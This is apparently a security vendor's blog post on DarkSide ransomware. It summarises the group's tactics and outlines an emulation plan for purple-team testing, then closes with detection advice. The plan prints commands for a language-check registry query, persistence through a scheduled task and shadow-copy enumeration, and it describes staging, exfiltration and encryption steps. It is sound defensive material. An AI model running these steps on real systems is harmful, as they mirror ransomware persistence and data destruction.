In this blog we consume Cyber Threat Intelligence to understand how the DarkSide ransomware behaves, we create and share an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology for similar attacks, and we discuss how to detect and respond to DarkSide ransomware.
Cyber Threat Intelligence
The DarkSide ransomware has been used for 9-10 months per Catalin Cimpanu which gives us a good foundation of Cyber Threat Intelligence (CTI). This adversary emulation plan is based on Cybereason’s intel from April 2021. We see that DarkSide has evolved like Maze, Ryuk and Egregor to perform double extortion. Double extortion is when the threat group steals files from the victim to post on their website in order to pressure victims into paying as well as encrypting all the files and only offering to unlock them after payment is received.
According to DarkTracer: DarkWeb Criminal Intelligence, DarkSide has attacked 3 other Oil and Gas companies since November 2020.
From the CTI, there are a few things that stick out that we should test our organization’s for:
Command and Control was observed as HTTP (clear text) instead of HTTPS
Downloading the malware was directly to a “naked IP” not a domain name as most people would use to navigate to a website
PowerShell.exe and Certutil for downloading and executing the ransomware
Checking the operating system language before performing ransomware TTPs
Ensure you have the HTTP relay installed on your SCYTHE server or on a different host and redirecting to your SCYTHE server. Create a new SCYTHE campaign as you would normally do but select HTTP as the communication method. Ensure the parameters are correct for your relay configuration. The Cyber Threat Intelligence shows that “naked IPs” were used so you may want to set the parameters to an IP address instead of a domain name.
In the automation steps screen, import from existing threats: DarkSide. Here are a few steps from the plan we want to call out:
The DarkSide ransomware checks the operating system language before executing the ransomware. In Step 2 of the plan, we do the same checking for the English language: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language
Step 3 then decides if to continue to execute or not based on the language
Step 9 creates a new Scheduled Task named how the Cyber Threat Intelligence informed us: SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F
Step 17 performs data staging and step 18 does exfiltration through the C2 channel
Step 19 then encrypts the data and erases the original
Step 22 decides if your payload is running with local administrator privileges to then execute powershell Get-WmiObject Win32_Shadowcopy
Step 25 and 26 clean up to leave the system how we found it.
According to the Cyber Threat Intelligence, the threat actor leveraged PowerShell.exe and CertUtil.exe to download and then execute the ransomware.
In an attempt to not sound like a broken record, we will focus on what makes this ransomware different to detect and respond to. As usual, making daily backups and restoring will get you back and running as quickly as possible when the inevitable happens. However, you can detect and respond much earlier by building detection for these TTPs:
Detect and alert when the registry key is queried for the default language of the operating system, this is an early indicator.
Detect and alert when powershell.exe and certutil.exe goes out to the Internet to retrieve any file.
Detect and alert on any outbound connections to a “naked IP” address. Humans generally do not type these out. I have seen companies completely prevent this access with their web proxies.
Alert when a new scheduled task is created.
We can no longer ignore ransomware as an annoying attack that affects everyone but us. No company is immune to these attacks and therefore needs to be prepared. In this post we leveraged Cyber Threat Intelligence from Cybereason to understand how this adversary behaves, we created and shared an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology against similar attacks, and we discuss how to detect and respond to DarkSide ransomware.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email email@example.com, or follow on Twitter @scythe_io.